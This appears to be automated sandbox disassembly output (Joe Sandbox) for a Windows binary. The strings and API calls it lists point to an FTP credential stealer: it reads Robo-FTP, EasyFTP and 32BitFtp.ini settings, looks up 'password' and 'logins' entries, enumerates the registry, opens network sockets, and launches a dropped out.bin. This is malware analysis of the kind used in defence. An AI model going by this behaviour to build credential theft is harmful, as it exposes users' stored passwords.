Instruction Fuzzy Hash: 60215931648109FBEF11DEA0CD46AEF7BAAEB41344F104036F910A62A0E778CE91DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD75 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85stringCOMMON

Download Yara Rule

APIs

lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BDB3
lstrcmp.KERNEL32(table,?), ref: 0040BDE8

Part of subcall function 0040BA61: StrStrIA.SHLWAPI(?,() ), ref: 0040BA71

Strings

logins, xrefs: 0040BDAB
table, xrefs: 0040BDE3

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrcmplstrcmpi
String ID: logins$table
API String ID: 3524194181-3800951466
Opcode ID: fa18e4dd0982b67242fe996442a32f625b3320ce83fbbff7b722e99f140c80bd
Instruction ID: 3a40c41565500e902701e1848d039f58d080df20437b0215aab75c5c9d5ede82
Opcode Fuzzy Hash: fa18e4dd0982b67242fe996442a32f625b3320ce83fbbff7b722e99f140c80bd
Instruction Fuzzy Hash: 3A31E97280020DFACF21DF90CC45EDE7B79EB05324F10467AB620B11E1D7799A599B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00406F25 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

"password" : ", xrefs: 00406F6F, 00406F82

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: "password" : "
API String ID: 0-2310853927
Opcode ID: 7650465f5cf3c874b7e65bb6c3d8d2b77c1dfef899e0c979675bf05806f7e479
Instruction ID: 45aba81232741d314ac5a34a4e752bc44468cee2c465cabd3be2dbe885248bde
Opcode Fuzzy Hash: 7650465f5cf3c874b7e65bb6c3d8d2b77c1dfef899e0c979675bf05806f7e479
Instruction Fuzzy Hash: B021A13290404ABACF01AB61DC02DFF7E69AF45354F114037F802B51A1D7794EA0A7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004011C7 Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,0040281B,00000000,?,00000000,?,?,?,?), ref: 004011E6
ReadFile.KERNEL32(00000001,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,0040281B,00000000,?), ref: 0040120A
CloseHandle.KERNEL32(00000001,00000001,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,0040281B,00000000), ref: 00401216

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: 50cf0d4a8abcb61ab1f7dbba7f21a5e0faee21dc4003284f941313b7acaaea2d
Instruction ID: 9a8629f224f69e54f689e61892df27772ad9712273c938ebafa7b15970847946
Opcode Fuzzy Hash: 50cf0d4a8abcb61ab1f7dbba7f21a5e0faee21dc4003284f941313b7acaaea2d
Instruction Fuzzy Hash: 34016D31A8010CBAEF21AA91CC42FDDBA68EB14749F104067B640B81E0DAF59BE49B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D235 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040D27F

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

FTP Count, xrefs: 0040D23F
FTP File%d, xrefs: 0040D276
SOFTWARE\Robo-FTP 3.7\Scripts, xrefs: 0040D244, 0040D28D

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
API String ID: 988369812-376751567
Opcode ID: 838302b0cbbaf92f0ec7b52adb3b95b28ebc4cce17ba5b2e21be763f73931f6d
Instruction ID: 733166de7694fff61650cae4219a8b91f3663e04ca220c69e26ca0c91532b7c9
Opcode Fuzzy Hash: 838302b0cbbaf92f0ec7b52adb3b95b28ebc4cce17ba5b2e21be763f73931f6d
Instruction Fuzzy Hash: 96015E70D40109FAEF10AAD0CC45EEE7A79AF00358F1080BBF910B11D0DBB9CB889A19

Uniqueness

Uniqueness Score: -1.00%

Function 00401E39 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401E64

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401E99
KA, xrefs: 00401E7D

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: AllocFolderLocalPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$KA
API String ID: 1254228173-2615768160
Opcode ID: d5d357410ab83e98cf9bbd3f5a2a5c0ffe0def8a915ad7b865be8bdc77fa2d19
Instruction ID: 6fd8fff447d07906f10b5f8dbf392f76df401ed06715ae1cca096ad24fd244de
Opcode Fuzzy Hash: d5d357410ab83e98cf9bbd3f5a2a5c0ffe0def8a915ad7b865be8bdc77fa2d19
Instruction Fuzzy Hash: 83017176A04209EBDF10DB50DD01F9EBBA5AB40754F208277E905BA2E0D778AA40DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A00C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(006B25B0,Odin), ref: 0040A05E

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

SiteInfo.QFP, xrefs: 0040A034, 0040A073
Odin, xrefs: 0040A058

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: Odin$SiteInfo.QFP
API String ID: 2826327444-4277389770
Opcode ID: 4c7248ef04e8f1490200b2f0e740a78defcc5c193a6946ac1caef0c963654f21
Instruction ID: d439cf8bf0481c86074634a938aa210d067d705921936e6cd1a06c5d2c247eac
Opcode Fuzzy Hash: 4c7248ef04e8f1490200b2f0e740a78defcc5c193a6946ac1caef0c963654f21
Instruction Fuzzy Hash: A90184705002087AD7217A318C06FBB3E55AB82394F24417BBD45751E2DA7C9A9196EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040753C Relevance: 4.6, APIs: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040754F
RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407583
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004075E6

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID:
API String ID: 4012628704-0
Opcode ID: db33a7c6a886425c088a00926d5cd44eaeee36640faa36180f72b49ad5f95758
Instruction ID: ff976bc959ca2582d7f9fb6c7aa1900dc22499e6707232f63fb9872b5199db0c
Opcode Fuzzy Hash: db33a7c6a886425c088a00926d5cd44eaeee36640faa36180f72b49ad5f95758
Instruction Fuzzy Hash: 2C110A3190410CFADF21AF90CC41BDEBBBABF04304F1085B6B554B11A0DBB9AB919F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040376A Relevance: 4.6, APIs: 3, Instructions: 50networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00403779
connect.WSOCK32(00000000,00000002,00000010,00000000,00403E6F,00000010,00000002,00000001,00000006,00000000), ref: 004037D5
closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000000,00403E6F,00000010,00000002,00000001,00000006,00000000), ref: 004037E0

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: closesocketconnectsocket
String ID:
API String ID: 643388700-0
Opcode ID: e54a13f195557317363138ba1c468d66cb1ca040bdcacf83dc864eb48c4e15a9
Instruction ID: a1857349bc829c1bc20843199a046abb25a1bdb55ef10f43378bc7cb5178758d
Opcode Fuzzy Hash: e54a13f195557317363138ba1c468d66cb1ca040bdcacf83dc864eb48c4e15a9
Instruction Fuzzy Hash: 330144F1910208AADF109E658C81FEE766C6B10729F10C63BF921A71D1D7BC9B849A1A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F316 Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F329
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F35D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3B7

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: 8574643922b93c115619fa754c947736bc9450eabf62dfeac87d4b84afb7821b
Instruction ID: 462c752db9e27f47ae53204000debf6e585b0193fea08707f7ce4c04aeeaebcb
Opcode Fuzzy Hash: 8574643922b93c115619fa754c947736bc9450eabf62dfeac87d4b84afb7821b
Instruction Fuzzy Hash: 5411523191010CBACF11AF91CC02FEE7B79BF04304F1081B6B910B41E1DBB99A959F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F277 Relevance: 4.5, APIs: 3, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F28A
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F2BA
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F30D

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: 8d0953e888e0d619827c180b3e218068bec35f8f5354f062792c62cfbc32bfbb
Instruction ID: ad9791ee34dc053147e0e202f980dc9d486fdf301f14b13ae9b05856cabc288a
Opcode Fuzzy Hash: 8d0953e888e0d619827c180b3e218068bec35f8f5354f062792c62cfbc32bfbb
Instruction Fuzzy Hash: 5911613590010CBADF21AF51CC02FEEBB79BF00304F1080B6B514751E1DBB99A949F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040CADE Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,EasyFTP,80000002,SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32,00000000,00000000), ref: 0040CB15

Part of subcall function 004023B3: lstrlen.KERNEL32(?,?,00000000), ref: 004023C7
Part of subcall function 004023B3: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 004023E6
Part of subcall function 004023B3: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023F8
Part of subcall function 004023B3: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040240A

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CAF7
EasyFTP, xrefs: 0040CB0D

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
API String ID: 1884169789-2776585315
Opcode ID: 0653eb3be4ab3f6b26213f4cfba9692d49c28e75d2c1db3c20ed1d3e16125c4c
Instruction ID: b39278b18dbf8c26ca4307c2e89347ed2fbb3e3fb77695099482c5910f249660
Opcode Fuzzy Hash: 0653eb3be4ab3f6b26213f4cfba9692d49c28e75d2c1db3c20ed1d3e16125c4c
Instruction Fuzzy Hash: 9DF03670A40208FADF117BA2DC43F9D7D259B40748F20417ABA14781F2DAB9AB90965C

Uniqueness

Uniqueness Score: -1.00%

Function 00407DD3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407DF7

Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
Part of subcall function 00401D80: lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
Part of subcall function 00401D80: lstrcat.KERNEL32(00000000,?), ref: 00401DC8

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

\32BitFtp.ini, xrefs: 00407E07

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
String ID: \32BitFtp.ini
API String ID: 2776971706-1260517637
Opcode ID: 5f27a85529b51448f4a4cfa6a7ad899e7577aa2ea05404c79be7375b835871cc
Instruction ID: 1389ecb65f354701ace5dcb0f9ef147cc3b7d0dfef94225e7727ab2b5740e0a4
Opcode Fuzzy Hash: 5f27a85529b51448f4a4cfa6a7ad899e7577aa2ea05404c79be7375b835871cc
Instruction Fuzzy Hash: 03F01270A00108BADB10BB61CC42FDE7A699B40784F504077B644B91F2DAB9AF909A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4D0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0040E50D

Strings

.xml, xrefs: 0040E51C

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .xml
API String ID: 1659193697-2937849440
Opcode ID: e6cce209fdb9d1f3e95dca0f6ca33f6c3ccdce671c612e0a0f5651d69d88af7a
Instruction ID: c45dfb1794c4f98016c9ca4be0e2f08c057de663647413feea2da31215a0b00a
Opcode Fuzzy Hash: e6cce209fdb9d1f3e95dca0f6ca33f6c3ccdce671c612e0a0f5651d69d88af7a
Instruction Fuzzy Hash: D8F03031800108FACF11FFD1CC46ECDBA75AB54318F108066B610B11E1C7799B60EB48

Uniqueness

Uniqueness Score: -1.00%

Function 00401EBE Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401EEA
CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401EF7

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: fa646eff9556507df081fc50559438c4630db0e396a331f2fe6041c822879479
Instruction ID: ae53e0fa8e9e6530ccfc04697b2f27395322c80062e4a93ded0919953aad80eb
Opcode Fuzzy Hash: fa646eff9556507df081fc50559438c4630db0e396a331f2fe6041c822879479
Instruction Fuzzy Hash: 36E04F7239034437FB311669DC83F5A39C85711758F104432B741BD2E1D5E9E9C1425C

Uniqueness

Uniqueness Score: -1.00%

Function 00403730 Relevance: 3.0, APIs: 2, Instructions: 22networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000006,?,004037C4,00000000,00403E6F,00000010,00000002,00000001,00000006,00000000), ref: 00403736
gethostbyname.WSOCK32(00000006,00000006,?,004037C4,00000000,00403E6F,00000010,00000002,00000001,00000006,00000000), ref: 00403743

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID:
API String ID: 1594361348-0
Opcode ID: 7aab4fff7dc92cfc0c5571e637043328c6e422358fab4e9098a4952ffd73172e
Instruction ID: fdc356c81ba0950dfb6492ac3d983a2c0d3c8ba02eba1d65fe839404965df06e
Opcode Fuzzy Hash: 7aab4fff7dc92cfc0c5571e637043328c6e422358fab4e9098a4952ffd73172e
Instruction Fuzzy Hash: A8E046B42086059BCA20AE3CC9508553B98AB223B9B10C332F135EB2F1E7B8DA915649

Uniqueness

Uniqueness Score: -1.00%

Function 00410456 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0041045A
ExitProcess.KERNEL32(00000000), ref: 00410478

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CountExitProcessTick
String ID:
API String ID: 232575682-0
Opcode ID: 1601a99006e50a2f21b94e678d2f417ae5db69e4e24824a71b1a815281a00afd
Instruction ID: 76dbcd441a10d5e0a871c7e97b5f494e5c4a0d931a8fcfb06eb2bf694422bdfd
Opcode Fuzzy Hash: 1601a99006e50a2f21b94e678d2f417ae5db69e4e24824a71b1a815281a00afd
Instruction Fuzzy Hash: A6C08C3030830881D54872A348C67FA320747C1704F60801BE78A0068B5CDC8CD2105F

Uniqueness

Uniqueness Score: -1.00%

Function 004013AA Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,0040FBA3,?,out.bin,?,?,?,?,?,het2563783920299393,?), ref: 004013C1

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: bf7dddda83a23b081a6631e27631dc37d4935e9c7fd66d2cd68a7ebe89652b8f
Instruction ID: 4126e1cfcb80788e4bd4fd358d88d7f4ec4d3cc9a087a1ea26b0b77c28cea769
Opcode Fuzzy Hash: bf7dddda83a23b081a6631e27631dc37d4935e9c7fd66d2cd68a7ebe89652b8f
Instruction Fuzzy Hash: EAE0A932900118ABDF10CAA99C00BCE37A8AB01368F000126BE00E22D0E2B4DB50C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041040C Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 00410365: OleInitialize.OLE32(00000000), ref: 00410371
Part of subcall function 00410365: GetUserNameA.ADVAPI32(00000101,00000101), ref: 004103C1

Part of subcall function 0040FBE5: DeleteFileA.KERNEL32(out.bin), ref: 0040FBFD

Part of subcall function 0040FCF4: GetTempPathA.KERNEL32(00000104,?,?,00000000,00000002), ref: 0040FDD8
Part of subcall function 0040FCF4: GetTickCount.KERNEL32 ref: 0040FDF0
Part of subcall function 0040FCF4: wsprintfA.USER32 ref: 0040FE02
Part of subcall function 0040FCF4: CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FE13
Part of subcall function 0040FCF4: lstrlen.KERNEL32(true,?,?,?,?,?,?,00000000), ref: 0040FE7B
Part of subcall function 0040FCF4: ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FEA4

RevertToSelf.ADVAPI32(00410476), ref: 00410436

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CountCreateDeleteDirectoryExecuteFileInitializeNamePathRevertSelfShellTempTickUserlstrlenwsprintf
String ID:
API String ID: 163229844-0
Opcode ID: 43a47021052f348c67490d8baaaef851d14be7feaee73a82a7c7b13bb8f783ba
Instruction ID: c2b2c459d4f3131f17968ebac81e274493c59280bd2fcc7cfa71c51367c22b11
Opcode Fuzzy Hash: 43a47021052f348c67490d8baaaef851d14be7feaee73a82a7c7b13bb8f783ba
Instruction Fuzzy Hash: 5ED0E2340081498AD634BBE7E40B7D97264AB8030DF40403FAA28195A38EFD64C8CA7F

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

756A4620.OLE32(00000000,00000001,?,?,00402094,?,?,?,?,004103E4), ref: 0040100E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: A4620
String ID:
API String ID: 934745325-0
Opcode ID: 694c167474c0dfd59027bfa7c2f8b8999a17ec50b574406e1e4598e2457a9e08
Instruction ID: 0e1ccdeaae2e50ef4e3fbd726c8f2877eddf4e537a0dea00bc73588f11d81fdc
Opcode Fuzzy Hash: 694c167474c0dfd59027bfa7c2f8b8999a17ec50b574406e1e4598e2457a9e08
